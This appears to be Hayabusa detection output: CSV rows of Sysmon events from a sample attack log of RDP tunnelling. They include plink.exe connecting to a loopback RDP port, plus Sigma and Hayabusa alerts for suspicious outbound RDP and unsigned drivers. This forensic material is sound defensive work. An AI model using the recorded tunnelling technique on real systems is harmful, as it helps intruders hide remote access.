2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.962 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49187 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49187 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\vga.dll | Status: Valid | Hash: SHA1=00F4056FD5FE28EC255B4521EE18C700BCF9CEEB,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\vga.dll | Signature: Microsoft Windows,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\TSTheme.exe -Embedding | Process: C:\Windows\System32\TSTheme.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x26656 | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:06.410 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:06.971 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\TSTheme.exe | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:5355 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (PC01.example.corp) | Dst: 10.0.2.18:137 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49184 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: PC01\IEUser | Parent Cmd: winlogon.exe | LID: 0x26656 | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\AtBroker.exe | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:63309 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:62259 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49185 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:59302 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:61049 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49186 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:52122 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:55679 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:64257 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49187 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network
Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | 
PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:02.311 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49188 (PC01.example.corp) | Dst: 10.0.2.18:5357 (PC02) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:02.561 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 127.0.0.1:3702 (PC01.example.corp) | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49189 (PC01.example.corp) | Dst: 127.0.0.1:5357 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:5357 (PC01.example.corp) | Dst: 127.0.0.1:49189 (PC01.example.corp) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:38.843 
